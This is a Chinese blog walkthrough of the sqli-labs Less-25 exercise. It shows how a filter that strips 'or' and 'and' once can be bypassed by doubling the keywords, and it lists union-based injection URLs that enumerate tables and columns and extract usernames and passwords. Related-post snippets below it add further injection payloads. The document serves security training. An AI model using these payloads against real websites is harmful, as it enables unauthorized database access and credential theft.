Less-25 (绕过AND OR 过滤)

最新推荐文章于 2022-08-21 08:53:30 发布
最新推荐文章于 2022-08-21 08:53:30 发布
阅读量622 收藏
点赞数 4
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107316430
版权

文章目录

1. 题目分析

这一关还是一个基于GET的注入,还是要先构造一个ID作为参数给他传进去。因为题目给的是string single quote,所以ID的类型一定是单引号包裹的了。
在这里插入图片描述
在这里插入图片描述
根据一往的经验,两条语句一看便知。那么这道关卡的考点在哪里呢?

当我使用order by测试检索字段的时候,就出现了问题。
在这里插入图片描述
这里我明明输入的order by结果报错就只剩下了der by,根据题目上的or and and belong to us我们不难猜测,可能自己输入的or或者and应按是被后台给吃掉了。

我的第一反应是混用大小写,结果发现没有效果。后来尝试了一下oorrder by结果奏效了。

在这里插入图片描述
可能就是后台仅仅过滤了一次,去掉了oorder中间的or变成了order。那么此关卡的思路就很明确了。

使用如下代替方法即可:
or->oorr
and->anandd

2. 源码分析

以上呢是我个人的猜测,自己测试了一下也是可用的。但是为了更加理解这一关,还是需要看一下源代码。

下面就摘录一下比较核心的地方:

$id=$_GET['id'];
$id= blacklist($id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

以上就是网站获取id然后进行查询的过程。过程中使用了blacklist()id进行了处理。
我们看一下这个函数的功能:

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

就是将id中的orand都转化为空。(i表示忽略大小写)
这也就验证了上面的猜测,oorr由于将中间的or变成了空,所以就变成了or

3. 注入过程

  1. 通过?id=1' oorrder by 4 --+得知检索字段为3.
  2. 使用联合查询, 爆表
    ?id=' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema="security"),3 --+
  3. 已知表名,爆字段
    ?id= ' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema="security" aandnd table_name="users"),3 --+
  4. 最后爆值
    ?id= ' union select 1,(select concat(username, passwoorrd) from users limit 0,1),3 --+
老司机开代码
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-LABS Less-25&&Less-25a
m0_64898960的博客
04-26 2067
Less-25题目 进入题目看到这样的一句话,英语不好 百度翻译 好吧,试了下,只是回显输入的语句,个人感觉没啥用…闭合条件为“ ’ ”,而且好像可以用注释符了… 查字段,看图片提示好像不可以使用or和and,应该是此处不能用order by来查的原因所以改用union select 查数据库 接下来正常的联合查询是有or的,如information…所以我们得另寻道路 尝试大小写如INFORMATION,报错 大小写如infOrmation,报错。猜测大小写是绕不过了… 尝试hex编码(url
sql绕过less-23 less-25 less-26 less-27 以及一点http头注入 less-18 less-5
最新发布
weixin_74182283的博客
04-01 1267
拆分该语句 为了完成绕过,需要先将id进行闭合 因此语句为 id='xx' || 1',此时多了个单引号出来,因此需要将其闭合,变成id='xx' || '1',语句为id='xx' || '1' 这时,因为||是可以替代or来进行使用的(这个是学计算机的基本常识),在语法中相当于或者,而此时右边的 '1' 永远为真(因为 '1' 永远都是’1‘ )因此可以通过该语句直接完成绕过。而我们这里的http头注入所运用的报错函数,他就是需要~才能导致报错的出现,因此只要存在波浪线,就可以确保这个函数报错。
Less-25(绕过or或and--盲注)
老司机开代码的博客
08-04 455
文章目录1. 题目分析2. 注入思路2.1 盲注2.2 联合注入3. SQLmap注入 1. 题目分析 根据less24的经验以及通过?id=1 aandnd 1=2 --+和?id=1 aandnd 1=1 --+可以判断出id的类型为int;并且可以使用盲注或联合查询两种方法解决的题目。 一下主要回顾盲注的解题思路: False页面: True页面: 之前学习过盲注,我们知道盲注主要分为布尔盲注和时间盲注,同时再回忆一下要使用的函数: length() :判断字长 substr(): 从字符串中取
Sqli-labs之Less-25和Less-25a
→_→
04-21 881
Less-25 GET-基于错误-您所有的OR&AND都属于我们-字符串单引号 Notice: Undefined variable: hint in C:\phpStudy\WWW\sqli\Less-25\index.php on line 81 Hint: Your Input is ...
sqli-labs:less-25(过滤了and,or)
羽的博客
09-12 208
很人性化,还可以返回被过滤的语句。方便学习。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con..
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
mrcrowl.easy-less-1.7.2.zip
03-25
《深入解析mrcrowl.easy-less-1.7.2.zip:轻松驾驭LESS语言的VSCode插件》 在Web开发领域,LESS是一种强大的CSS预处理器,它扩展了CSS的功能,引入了变量、嵌套规则、混合(mixins)以及函数等特性,使得CSS代码...
less-is-more:注意工件增加的百分比
04-17
少即是多v0.0.4 如果当前工件的大小增加到与最新发布的工件相比所允许的大小更多,则此工作流程将仅会失败。 及早发现不需要的大小增加,这非常有用,尤其是在针对拉取请求运行的工作流中。必需的输入参数release_...
sqli-labs\Less 25~30
Gjqhs的博客
03-11 1097
less-25——过滤了or和and的单引号注入 http://127.0.0.1/sqli-labs/Less-25/?id=-1%27%20union%20select%201,2,3--+ less-26——基于单引号字符型过滤了注释和空格的注入 http://127.0.0.1/sqli-labs/Less-26/?id=-1%27aandnd(updatexml(1,%27aaaa%27,1))anandd%271%27=%271 less-27——基于’字符型过滤了unio.
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 412
sql-lib项目,本篇文章介绍卡21-25。 闭合变成了双引号,其余和上一一样。 这一过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
sqli-labs————less 25(绕or\and)
Fly_鹏程万里
05-12 985
Less-25卡提示,我们可以知晓该卡主要过滤了“or”和“and”,那么我们看看它的源代码到底是如何过滤的:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns...
LESS-23 LESS-25 LESS-25a
qq_44598397的博客
03-30 280
LESS-23 源码: 以此可知可以通过报错注入等方式 语法: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲c...
Sqli-labs Less25-28 绕过过滤函数对字符的过滤 - GET
kevinhanser
08-10 498
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR &amp; AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...
sqli-labs (less25-less28a)
Xi4or0uji
08-04 414
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or &amp;&amp; and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&amp;&amp;、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
sqli-labs-less25-less25a
沐目的博客
04-10 499
less-25 单引号 GET型 一道水题,就是让我们感受一下过滤,只是过滤了or和and。 就是用很基础的union 查询就可以了。但是注意一下,在写information的时候,它会把“or“给过滤掉,但是我们可以使用双写绕过。 数据库: -1’ union select 1,2,database() %23 表和字段: -1’ union select 1,group_concat...
less过滤日志
jupiter_888的博客
04-27 1319
# 根据键字在日志中查找 [root@app]# less /data/logs/xxx/root.log | grep order 打印日志到文件 [root@app]# less /data/logs/xxx/root.log | grep fa374119105fc9e4 > order.log > 覆盖 >>...
安装less-loader 和less
09-08
安装less-loader和less的步骤如下: 1. 确定你正在使用的webpack版本。根据webpack的版本选择合适的less-loader版本。例如,如果你使用的是webpack@4,那么可以选择less-loader@5~7版本。 2. 打开命令行终端,运行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值